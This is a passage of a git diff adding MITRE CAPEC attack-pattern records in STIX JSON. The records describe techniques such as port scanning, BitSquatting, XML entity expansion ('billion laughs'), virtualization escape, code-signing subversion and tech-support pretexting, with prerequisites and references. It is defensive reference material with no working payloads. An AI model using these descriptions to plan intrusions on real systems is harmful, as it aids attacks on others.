micro-services may provide another vector for a range of attacks. It should be emphasized that the presence of micro-services does not necessarily make a site vulnerable to attack, but they do provide additional complexity to a web page and therefore may contain vulnerabilities that support other attack patterns.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/179.html", + "external_id": "CAPEC-179" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The target site must use micro-services that interact with the server and one or more of these micro-services must be vulnerable to some other attack pattern." + ], + "x_capec_resources_required": [ + "The attacker usually needs to be able to invoke micro-services directly in order to control the parameters that are used in their attack. The attacker may require other resources depending on the nature of the flaw in the targeted micro-service." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4955f71c-ddd9-4ad6-9fe5-2583defa2070.json b/capec/attack-pattern/attack-pattern--4955f71c-ddd9-4ad6-9fe5-2583defa2070.json new file mode 100644 index 0000000000..715159a632 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4955f71c-ddd9-4ad6-9fe5-2583defa2070.json @@ -0,0 +1,84 @@ +{ + "type": "bundle", + "id": "bundle--4da1013e-589a-4fa1-ac75-af9f27174ad8", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4955f71c-ddd9-4ad6-9fe5-2583defa2070", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Port Scanning", + "description": "An adversary uses a combination of techniques to determine the state of the ports on a remote target. Any service or application available for TCP or UDP networking will have a port open for communications over the network. Although common services have assigned port numbers, services and applications can run on arbitrary ports. Additionally, port scanning is complicated by the potential for any machine to have up to 65535 possible UDP or TCP services. The goal of port scanning is often broader than identifying open ports, but also give the adversary information concerning the firewall configuration. Depending upon the method of scanning that is used, the process can be stealthy or more obtrusive, the latter being more easily detectable due to the volume of packets involved, anomalous packet traits, or system logging. Typical port scanning activity involves sending probes to a range of ports and observing the responses. There are four types of port status that this type of attack aims to identify: 1) Open Port: The port is open and a firewall does not block access to the port, 2) Closed Port: The port is closed (i.e. no service resides there) and a firewall does not block access to the port, 3) Filtered Port: A firewall or ACL rule is blocking access to the port in some manner, although the presence of a listening service on the port cannot be verified, and 4) Unfiltered Port: A firewall or ACL rule is not blocking access to the port, although the presence of a listening service on the port cannot be verified. For strategic purposes it is useful for an adversary to distinguish between an open port that is protected by a filter vs. a closed port that is not protected by a filter. Making these fine grained distinctions is impossible with certain scan types. A TCP connect scan, for instance, cannot distinguish a blocked port with an active service from a closed port that is not firewalled. Other scan types can only detect closed ports, while others cannot detect port state at all, only the presence or absence of filters. Collecting this type of information tells the adversary which ports can be attacked directly, which must be attacked with filter evasion techniques like fragmentation, source port scans, and which ports are unprotected (i.e. not firewalled) but aren't hosting a network service. An adversary often combines various techniques in order to gain a more complete picture of the firewall filtering mechanisms in place for a host.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/300.html", + "external_id": "CAPEC-300" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Postel, RFC768 - User Datagram Protocol, 1980--08---28", + "url": "http://www.faqs.org/rfcs/rfc768.html", + "external_id": "REF-158" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "The adversary requires logical access to the target's network in order to carry out this type of attack." + ], + "x_capec_resources_required": [ + "The adversary requires a network mapping/scanning tool, or must conduct socket programming on the command line. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4a2bd25a-02bc-4716-86e7-6ea7494b9c82.json b/capec/attack-pattern/attack-pattern--4a2bd25a-02bc-4716-86e7-6ea7494b9c82.json new file mode 100644 index 0000000000..b6966e2c8d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4a2bd25a-02bc-4716-86e7-6ea7494b9c82.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--36258100-f31d-4156-88e4-308c9248bb97", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4a2bd25a-02bc-4716-86e7-6ea7494b9c82", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "BitSquatting", + "description": "An adversary registers a domain name one bit different than a trusted domain. A BitSquatting attack leverages random errors in memory to direct Internet traffic to adversary-controlled destinations. BitSquatting requires no exploitation or complicated reverse engineering, and is operating system and architecture agnostic. Experimental observations show that BitSquatting popular websites could redirect non-trivial amounts of Internet traffic to a malicious entity.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/611.html", + "external_id": "CAPEC-611" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Artem Dinaburg, Bitsquatting: DNS Hijacking without exploitation, Raytheon", + "url": "http://media.blackhat.com/bh-us-11/Dinaburg/BH_US_11_Dinaburg_Bitsquatting_WP.pdf", + "external_id": "REF-485" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful BitSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL\u2019s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4a3aea87-ebbb-4369-bc6b-c774c5899b18.json b/capec/attack-pattern/attack-pattern--4a3aea87-ebbb-4369-bc6b-c774c5899b18.json new file mode 100644 index 0000000000..ba40600fd6 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4a3aea87-ebbb-4369-bc6b-c774c5899b18.json @@ -0,0 +1,89 @@ +{ + "type": "bundle", + "id": "bundle--45ee7351-9bfc-4d0f-a1a7-cd39bd009cff", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4a3aea87-ebbb-4369-bc6b-c774c5899b18", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "XML Entity Expansion", + "description": "An attacker submits an XML document to a target application where the XML document uses nested entity expansion to produce an excessively large output XML. XML allows the definition of macro-like structures that can be used to simplify the creation of complex structures. However, this capability can be abused to create excessive demands on a processor's CPU and memory. A small number of nested expansions can result in an exponential growth in demands on memory.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/197.html", + "external_id": "CAPEC-197" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html", + "external_id": "CWE-400" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Amit Klein, Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD", + "url": "http://www.securityfocus.com/archive/1/303509", + "external_id": "REF-64" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Pete Lindstrom, Attacking & Defending Web Services, 2002, SPiRE Security", + "url": "http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf", + "external_id": "REF-65" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Elliotte Rusty Harold, Tip: Configure SAX parsers for secure processing, IBM developerWorks, 2005--05---27, IBM", + "url": "http://www.ibm.com/developerworks/xml/library/x-tipcfsx.html", + "external_id": "REF-66" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Bryan Sullivan, XML Denial of Service Attacks and Defenses", + "url": "http://msdn.microsoft.com/en-us/magazine/ee335713.aspx", + "external_id": "REF-67" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Bryan Sullivan, XML Denial of Service Attacks and Defenses", + "url": "http://msdn.microsoft.com/en-us/magazine/ee335713.aspx", + "external_id": "REF-67" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Denial of Service)", + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_example_instances": [ + "\n The most common example of this type of attack is the \"many laughs\" attack (sometimes called the 'billion laughs' attack). For example:\n \n ]>&lol9;\n This is well formed and valid XML according to the DTD. Each entity increases the number entities by a factor of 10. The line of XML containing lol9; expands out exponentially to a message with 10^9 entities. A small message of a few KBs in size can easily be expanded into a few GB of memory in the parser. By including 3 more entities similar to the lol9 entity in the above code to the DTD, the program could expand out over a TB as there will now be 10^12 entities. Depending on the robustness of the target machine, this can lead to resource depletion, application crash, or even the execution of arbitrary code through a buffer overflow.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "This type of attack requires that the target must receive XML input but either fail to provide an upper limit for entity expansion or provide a limit that is so large that it does not preclude significant resource consumption." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "To send recursive entity expansion XML messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4af1aa45-5db1-4fbf-a5ee-f205d163cc9e.json b/capec/attack-pattern/attack-pattern--4af1aa45-5db1-4fbf-a5ee-f205d163cc9e.json new file mode 100644 index 0000000000..1da7fd3bc5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4af1aa45-5db1-4fbf-a5ee-f205d163cc9e.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--3af40261-155a-42e9-96c7-5233a0a2237e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4af1aa45-5db1-4fbf-a5ee-f205d163cc9e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-09-30T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Escaping Virtualization", + "description": "An adversary gains access to an application, service, or device with the privileges of an authorized or privileged user by escaping the confines of a virtualized environment. The adversary is then able to access resources or execute unauthorized code within the host environment, generally with the privileges of the user running the virtualized process. Successfully executing an attack of this type is often the first step in executing more complex attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/480.html", + "external_id": "CAPEC-480" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4bac5a5b-c263-414b-9b78-fb93a60c98ed.json b/capec/attack-pattern/attack-pattern--4bac5a5b-c263-414b-9b78-fb93a60c98ed.json new file mode 100644 index 0000000000..f34f87a813 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4bac5a5b-c263-414b-9b78-fb93a60c98ed.json @@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--40a2d9f6-d67e-4e91-9910-ac432986c52b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4bac5a5b-c263-414b-9b78-fb93a60c98ed", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "ICMP Information Request", + "description": "An adversary sends an ICMP Information Request to a host to determine if it will respond to this deprecated mechanism. ICMP Information Requests are a deprecated message type. Information Requests were originally used for diskless machines to automatically obtain their network configuration, but this message type has been superseded by more robust protocol implementations like DHCP.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/296.html", + "external_id": "CAPEC-296" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc792.html", + "external_id": "REF-123" + }, + { + "source_name": "reference_from_CAPEC", + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "url": "http://www.faqs.org/rfcs/rfc1122.html", + "external_id": "REF-124" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Mark Wolfgang, Host Discovery with Nmap, 2002--11", + "url": "http://nmap.org/docs/discovery.pdf", + "external_id": "REF-125" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Other" + ] + }, + "x_capec_prerequisites": [ + "The ability to send an ICMP Type 15 Information Request and receive an ICMP Type 16 Information Reply in response." + ], + "x_capec_resources_required": [ + "Scanners or utilities that provide the ability to send custom ICMP queries." + ], + "x_capec_skills_required": { + "Low": "The adversary needs to know certain linux commands for this type of attack." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4c20557e-86ee-4ba3-97e5-6cd0772e9356.json b/capec/attack-pattern/attack-pattern--4c20557e-86ee-4ba3-97e5-6cd0772e9356.json new file mode 100644 index 0000000000..b35e596e47 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4c20557e-86ee-4ba3-97e5-6cd0772e9356.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--0e7e78bd-8886-415b-a379-c19dd0f5b968", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4c20557e-86ee-4ba3-97e5-6cd0772e9356", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Subvert Code-signing Facilities", + "description": "Many languages use code signing facilities to vouch for code's identity and to thus tie code to its assigned privileges within an environment. Subverting this mechanism can be instrumental in an attacker escalating privilege. Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/68.html", + "external_id": "CAPEC-68" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/325.html", + "external_id": "CWE-325" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/328.html", + "external_id": "CWE-328" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "In old versions (prior to 3.0b4) of the Netscape web browser Attackers able to foist a malicious Applet into a client's browser could execute the \"Magic Coat\" attack. In this attack, the offending Applet would implement its own getSigners() method. This implementation would use the containing VM's APIs to acquire other Applet's signatures (by calling _their_ getSigners() method) and if any running Applet had privileged-enough signature, the malicious Applet would have inherited that privilege just be (metaphorically) donning the others' coats.", + "Some (older) web browsers allowed scripting languages, such as JavaScript, to call signed Java code. In these circumstances, the browser's VM implementation would choose not to conduct stack inspection across language boundaries (from called signed Java to calling JavaScript) and would short-circuit \"true\" at the language boundary. Doing so meant that the VM would allow any (unprivileged) script to call privileged functions within signed code with impunity, causing them to fall prey to luring attacks.", + "The ability to load unsigned code into the kernel of earlier versions of Vista and bypass integrity checking is an example of such subversion. In the proof-of-concept, it is possible to bypass the signature-checking mechanism Vista uses to load device drivers." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "A framework-based language that supports code signing (such as, and most commonly, Java or .NET)", + "Deployed code that has been signed by its authoring vendor, or a partner.", + "The attacker will, for most circumstances, also need to be able to place code in the victim container. This does not necessarily mean that they will have to subvert host-level security, except when explicitly indicated." + ], + "x_capec_resources_required": [ + "The Attacker needs no special resources beyond the listed prerequisites in order to conduct this style of attack." + ], + "x_capec_skills_required": { + "High": "Subverting code signing is not a trivial activity. Most code signing and verification schemes are based on use of cryptography and the attacker needs to have an understanding of these cryptographic operations in good detail. Additionally the attacker also needs to be aware of the way memory is assigned and accessed by the container since, often, the only way to subvert code signing would be to patch the code in memory. Finally, a knowledge of the platform specific mechanisms of signing and verifying code is a must." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4ce66943-e754-4fcf-bdaf-81660eb6597b.json b/capec/attack-pattern/attack-pattern--4ce66943-e754-4fcf-bdaf-81660eb6597b.json new file mode 100644 index 0000000000..032b25e558 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4ce66943-e754-4fcf-bdaf-81660eb6597b.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--ee20b07d-fcfc-436d-bb8b-f9e583cdc1d0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4ce66943-e754-4fcf-bdaf-81660eb6597b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Pointer Manipulation", + "description": "This attack pattern involves an adversary manipulating a pointer within a target application resulting in the application accessing an unintended memory location. This can result in the crashing of the application or, for certain pointer values, access to data that would not normally be possible or the execution of arbitrary code. Since pointers are simply integer variables, Integer Attacks may often be used in Pointer Attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/129.html", + "external_id": "CAPEC-129" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/682.html", + "external_id": "CWE-682" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/822.html", + "external_id": "CWE-822" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/823.html", + "external_id": "CWE-823" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_prerequisites": [ + "The target application must have a pointer variable that the attacker can influence to hold an arbitrary value." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4d39083a-01db-4b17-a4b8-25037eb51560.json b/capec/attack-pattern/attack-pattern--4d39083a-01db-4b17-a4b8-25037eb51560.json new file mode 100644 index 0000000000..ff0e0d118b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4d39083a-01db-4b17-a4b8-25037eb51560.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--bc7dfee8-ec9c-406a-8eb8-9b7b0cbef73f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4d39083a-01db-4b17-a4b8-25037eb51560", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Try All Common Switches", + "description": "An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is blindly attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/133.html", + "external_id": "CAPEC-133" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/912.html", + "external_id": "CWE-912" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The attacker must be able to control the options or switches sent to the target." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to send requests to the target." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4d4f39de-ca45-4daf-b6c3-e70a531d8814.json b/capec/attack-pattern/attack-pattern--4d4f39de-ca45-4daf-b6c3-e70a531d8814.json new file mode 100644 index 0000000000..f9c309744b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4d4f39de-ca45-4daf-b6c3-e70a531d8814.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--91fecf8c-6918-4c72-973e-e33d81597bfc", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4d4f39de-ca45-4daf-b6c3-e70a531d8814", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Tech Support", + "description": "An adversary engages in pretexting behavior, assuming the role of a tech support worker, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. An adversary who uses social engineering to impersonate a tech support worker can have devastating effects on a network. This is an effective attack vector, because it can give an adversary physical access to network computers. It only takes a matter of seconds for someone to compromise a computer with physical access. One of the best technological tools at the disposal of a social engineer, posing as a technical support person, is a USB thumb drive. These are small, easy to conceal, and can be loaded with different payloads depending on what task needs to be done. However, this form of attack does not require physical access as it can also be effectively carried out via phone or email.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/413.html", + "external_id": "CAPEC-413" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4dc9dd79-0519-4693-b524-885a73e82fdd.json b/capec/attack-pattern/attack-pattern--4dc9dd79-0519-4693-b524-885a73e82fdd.json new file mode 100644 index 0000000000..565d66ebfe --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4dc9dd79-0519-4693-b524-885a73e82fdd.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--82e51fd1-fc15-4e0a-97ff-67c091ab6995", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4dc9dd79-0519-4693-b524-885a73e82fdd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Intent Intercept", + "description": "An adversary, through a previously installed malicious application, intercepts messages from a trusted Android-based application in an attempt to achieve a variety of different objectives including denial of service, information disclosure, and data injection. An implicit intent sent from a trusted application can be received by any application that has declared an appropriate intent filter. If the intent is not protected by a permission that the malicious application lacks, then the attacker can gain access to the data contained within the intent. Further, the intent can be either blocked from reaching the intended destination, or modified and potentially forwarded along.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/499.html", + "external_id": "CAPEC-499" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/925.html", + "external_id": "CWE-925" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf", + "external_id": "REF-427" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application is used to intercept implicit intents." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4f19c031-001c-4400-8685-6010d9eeaa15.json b/capec/attack-pattern/attack-pattern--4f19c031-001c-4400-8685-6010d9eeaa15.json new file mode 100644 index 0000000000..4a97616f1a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4f19c031-001c-4400-8685-6010d9eeaa15.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--f3915b01-81eb-4a54-9e96-8730b1699901", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4f19c031-001c-4400-8685-6010d9eeaa15", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Targeted Malware", + "description": "An adversary develops targeted malware that takes advantage of a known vulnerability in an organizational information technology environment. The malware crafted for these attacks is based specifically on information gathered about the technology environment. Successfully executing the malware enables an adversary to achieve a wide variety of negative technical impacts.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/542.html", + "external_id": "CAPEC-542" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4f6b2e2c-f6b1-4a56-b211-bdc538047241.json b/capec/attack-pattern/attack-pattern--4f6b2e2c-f6b1-4a56-b211-bdc538047241.json new file mode 100644 index 0000000000..aa2219d32c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4f6b2e2c-f6b1-4a56-b211-bdc538047241.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--a1ed74b7-5f6d-4b18-96d6-e996c2744d5e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4f6b2e2c-f6b1-4a56-b211-bdc538047241", + 